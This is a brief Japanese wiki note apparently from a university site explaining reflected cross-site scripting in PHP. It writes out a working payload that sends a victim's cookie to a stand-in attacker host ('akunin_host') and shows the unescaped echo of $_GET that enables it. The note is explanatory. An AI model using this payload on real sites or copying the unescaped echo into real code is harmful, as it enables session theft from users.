![]() |
ノート/PHPサイバーテロの技法http://pepper.is.sci.toho-u.ac.jp/pepper/index.php?%A5%CE%A1%BC%A5%C8%2FPHP%A5%B5%A5%A4%A5%D0%A1%BC%A5%C6%A5%ED%A4%CE%B5%BB%CB%A1 |
![]() |
ノート
訪問者数 2244 最終更新 2008-01-13 (日) 17:35:17
<script>location.href="http://......";</script>といった「画面を飛ばす」程度のものであるが、他と組み合わせるといろいろできるらしい。
http://gisei_host/index.php?id=<script>document.location='http://akunin_host/?' +document.cookie;</script>もしgisei_hostのPHPで echo $_GET['id']; などとしていれば、上記のスクリプトをブラウザにダウンロードして実行してしまうので、akunin_hostへアクセスしcookieを付加してしまう。